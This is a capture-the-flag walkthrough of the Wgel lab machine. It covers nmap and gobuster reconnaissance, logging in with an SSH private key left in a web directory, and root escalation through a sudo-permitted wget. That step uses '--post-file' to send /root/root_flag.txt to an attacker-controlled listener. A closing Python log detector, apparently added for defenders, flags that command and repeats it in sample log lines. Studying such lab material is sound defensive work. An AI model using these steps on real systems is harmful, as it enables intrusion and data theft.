# Wgel CTF

![](/files/-MbY_hwEkqISC1BOIvTZ)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**):

```
nmap -Pn 10.10.139.244
```

![](/files/-MbYbliYwsua7hym23aE)

Detailed nmap scan:

Command breakdown:

* **-sV**: service version detection
* **-sC**: default nmap scripts
* **-p**: scan only ports 22 and 80
* **-oN nmap**: save the output to a file called `nmap`

```
nmap -sV -sC -p 22,80 -oN nmap 10.10.139.244
```

![](/files/-MbYbt9XP8uYTHSc4lvV)

## Enumeration

Let's visit port 80, the web server.

![](/files/-MbYc2sg88uTxF59Af-q)

It's a default Apache2 page. I made sure to check the source code and found something interesting.

![](/files/-MbYcU5XtUlrpjEw-Q6s)

We now have a possible username, `Jessie`. There is nothing else of interest, so let's run `gobuster` to find hidden directories.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.139.244/
```

![](/files/-MbYctbeDv9NAeVDadto)

We found a hidden directory; let's go check it out.

![](/files/-MbYcz6o-a6FhnxZNHup)

It is a very well-made website. Let's run gobuster on it in the background while we explore the page.

```
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.139.244/sitemap
```

Looking at the website, most of the buttons work and are functional. The gobuster results are in, so let's check them.

![](/files/-MbYf3vT6kMSyZh4aX-j)

There is a `/.ssh` directory, which is really interesting; let's go see it.

![](/files/-MbYfSaR_OR0hs1o8X-L)

We have an `id_rsa` file, which means that if we recover its passphrase with `john the ripper`, we can log in through `ssh`.

Let's first open the file, copy its contents, and paste them into our own `id_rsa` file.

![](/files/-MbYgjZWljGMwPlkXhX8)

Now let's find the passphrase for it using `ssh2john`.

```
/usr/share/john/ssh2john.py id_rsa > id_rsa_hash
```

![](/files/-MbYhGwbqTZC3Ba2OlA7)

Oh, it looks like we do not need a password to log in, so let's log in directly.

```
chmod 600 id_rsa
```

```
ssh jessie@10.10.139.244 -i id_rsa
```

![](/files/-MbYiGnNBNIVsmN-wkj6)

We are logged in. We can now read the `user.txt` file.

![](/files/-MbYiaJRvQIZm_z4gaug)

## Privilege Escalation

Let's run `sudo -l` to check what we can run as root.

```
sudo -l
```

![](/files/-MbYiq9Z0ahkKxSgSSkr)

It looks like we can run `/usr/bin/wget` as root. Since wget can send files as well as fetch them, we can try to send the root flag file to our machine. First we need to start an HTTP server to receive files.

```
python3 -m http.server 8080
```

![](/files/-MbYkvcOkZn5Cg7isDIN)

We also have to start a netcat listener.

![](/files/-MbYnQ7Ri5QOg3XogjHC)

Now let's use this command to send the root flag to our machine. We cannot be sure of the root flag's file name, but looking at how the user flag was named, we can guess it.

```
# <attacker-ip> and <listener-port> are placeholders for the machine and port where your listener runs (not the target's own address)
sudo /usr/bin/wget --post-file=/root/root_flag.txt http://<attacker-ip>:<listener-port>/
```

![](/files/-MbYnWzQK6XhZEE7DEei)

After you hit enter, you get the contents of the file.

![](/files/-MbYng9xuOF9RPLoBDMS)

This is the root flag.
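From the defender's side, the `sudo -l` entry above is what makes this box fall: a root-privileged `wget` that can read any local file with `--post-file` (or write one with `-O`) shows up plainly in the sudo log. The following is an added example, not part of the original writeup, that parses sudo log lines and flags exactly that pattern; the log lines and the 10.9.0.5 listener address are constructed for the example.

```python
import re
from dataclasses import dataclass

# Shape of the line sudo writes to auth.log / the journal for each command.
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# wget options that push a local file onto the network (--post-file, --body-file)
# or write a remote body to a local path (-O): under sudo, a root file read/write.
WGET_RISKY_OPTS = ("--post-file", "--body-file", "-O", "--output-document")


@dataclass
class Finding:
    user: str
    reason: str
    command: str


def classify_sudo_line(line: str):
    """Return a Finding when a sudo line runs wget as root with a file
    option, else None (benign commands and non-sudo lines alike)."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    user, target, cmd = m.group("user"), m.group("target"), m.group("cmd")
    argv = cmd.split()
    if not argv or target != "root" or argv[0].rsplit("/", 1)[-1] != "wget":
        return None
    for arg in argv[1:]:
        opt = arg.split("=", 1)[0]  # handles "--post-file=/x" and "--post-file /x"
        if opt in WGET_RISKY_OPTS:
            return Finding(user, f"sudo wget with {opt}", cmd)
    return None


def scan(lines):
    return [f for f in (classify_sudo_line(l) for l in lines) if f]


# Constructed sample log lines; only the --post-file line should be flagged.
SAMPLE_LOG = [
    "Jun 12 09:55:00 wgel sudo: admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update",
    "Jun 12 10:00:10 wgel sudo: jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=list",
    "Jun 12 10:00:40 wgel sudo: jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget https://example.invalid/notes.txt",
    "Jun 12 10:01:03 wgel sudo: jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt http://10.9.0.5:8080/",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"ALERT {f.user}: {f.reason}: {f.command}")
```

Fused short options such as `-O/tmp/x` are not split here; the real fix is to drop the `NOPASSWD` wget rule from sudoers, since any sudo-able wget is equivalent to root file access.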
